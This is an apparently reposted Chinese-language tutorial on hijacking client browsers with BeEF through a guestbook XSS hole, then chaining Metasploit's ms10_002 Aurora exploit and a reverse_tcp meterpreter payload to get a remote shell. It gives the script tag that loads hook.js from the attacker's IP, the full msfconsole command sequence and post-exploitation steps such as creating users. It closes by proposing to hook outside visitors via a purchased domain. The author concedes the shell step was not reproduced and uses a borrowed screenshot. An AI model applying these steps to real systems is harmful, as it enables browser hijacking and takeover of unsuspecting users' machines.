利用Beef劫持客戶端瀏覽器


利用Beef劫持客戶端瀏覽器

 

環境:

1.Kali(使用beef生成惡意代碼,IP:192.168.114.140)

2.一台web服務器(留言板存在XSS跨站腳本漏洞,IP:192.168.114.204)

3. 客戶端(用於訪問web服務器,IP:192.168.114.130)

步驟:

1. Kali使用beef生成惡意代碼

2. 將惡意代碼寫入192.168.114.204網站留言板

3. 只要客戶端訪問這個服務器的留言板,客戶端瀏覽器就會被劫持

目的:

控制目標主機的瀏覽器,通過目標主機瀏覽器獲得該主機的詳細信息,並進一步掃描內網,配合metasploit進行內網滲透

以下為具體操作:

一、搭建服務器

首先我在window server 2003上搭建IIS服務器,在站長之家找了一個存在XSS漏洞的留言板源碼(我心依然留言板),發布到IIS服務器上。


用WVS掃了一下,確實存在XSS漏洞:


二、Kali中Beef的安裝和使用:


啟動成功后:


瀏覽器輸入:http://127.0.0.1:3000/ui/panel,Usename與Password均為beef:


三、掛馬


將如上圖所示的Hook URL寫入web服務器存在XSS漏洞的留言板中<scriptsrc="http://192.168.114.140:3000/hook.js"></script>


如果留言被管理員審核通過,你的留言能在留言板顯示出來。當客戶端訪問服務器的留言板后,你可以在Beef控制端查看目標主機,如果出現下圖所示內網,表示客戶端瀏覽器已經被成功劫持


在Current Browser項選擇Browser,點擊Hooked Domain選擇Redirect Browser,在右邊的Redirect URL中輸入網址,即可控制瀏覽器跳轉到目標網址


 

Beef+msf拿客戶端shell(XP+IE6)

 

一、運行metasploit

Kali收藏欄找到metasploit framework


也可以新建終端輸入:msfconsole,啟動成功后:


輸入以下命令:

1.search ms10_002(尋找ms10_002漏洞)

2.useexploit/windows/browser/ms10_002_aurora(使用ms10_002極光漏洞)

3.set payloadwindows/meterpreter/reverse_tcp(設置TCP回連攻擊載荷)


4.show options(查看漏洞利用工具選項)


5.set srvhost 192.168.114.140(配置客戶端訪問的目標地址,這里是Kali本機的IP地址)

6.set srvport 7777(訪問的端口號)

7.set uripath /(網站根路徑)

8.set lhost 192.168.114.140(設置本地接收地址)

9.set lport 4444(端口號)


10.show options (查看是否更改過來)


11.exploit(執行利用,出現如下所示表示執行成功)


利用Beef生成的惡意代碼植入到存在XSS漏洞的web服務器(12.168.114.204),客戶端(192.168.114.130)瀏覽植入惡意代碼的網頁,造成客戶端瀏覽器被劫持。當前客戶端使用的環境為windows XP+IE6,我們使用metasploit framework工具針對IE6的ms10_002極光漏洞進行利用,控制客戶端被劫持的瀏覽器訪問192.168.114.140:7777,觸發該漏洞,通過漏洞拿到客戶端的權限shell,回連192.168.114.140:4444,從而達到控制客戶端系統的目的。


由於筆者的XP+IE6環境沒有搭好,以下用的firefox瀏覽器演示命令執行,跳轉之后的效果:


如何查看這個shell,我們在Kali中的metasploit終端按下回車。輸入sessions –i(由於用的firefox瀏覽器,所以沒有成功獲取session)


我在網上找了張圖,當成功利用,顯示如下:


根據sessions的Id,輸入sessions -i 1,得到meterpreter:

meterpreter是metasploit框架中的一個擴展模塊,作為溢出成功以后的攻擊載荷使用,攻擊載荷在溢出攻擊成功以后給我們返回一個控制通道。使用它作為攻擊載荷能夠獲得目標系統的一個meterpretershell的鏈接。meterpretershell作為滲透模塊有很多有用的功能,比如添加一個用戶、隱藏一些東西、打開shell、得到用戶密碼、上傳下載遠程主機的文件、運行cmd.exe、捕捉屏幕、得到遠程控制權、捕獲按鍵信息、清除應用程序、顯示遠程主機的系統信息、顯示遠程機器的網絡接口和IP地址等信息。另外meterpreter能夠躲避入侵檢測系統。在遠程主機上隱藏自己,它不改變系統硬盤中的文件,因此HIDS[基於主機的入侵檢測系統]很難對它做出響應。此外它在運行的時候系統時間是變化的,所以跟蹤它或者終止它對於一個有經驗的人也會變得非常困難。


輸入shell就可以拿到目標主機的一個cmd


然后就可以做任何想做的事比如net user 創建用戶等

二、漏洞發布網站:

想要使用metasploit,當然要配合漏洞進行利用,以下為漏洞發布網站,可以經常去看看:

https://www.exploit-db.com/

三、Beef如何在外網中應用思路

僅個人的一些想法,如果不對請指正:利用本機為Web服務器,購買域名,並將域名解析至本機IP地址,在本機的網站上寫入惡意代碼。當外網客戶端通過域名訪問我本機搭建的網站,導致瀏覽器被劫持。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM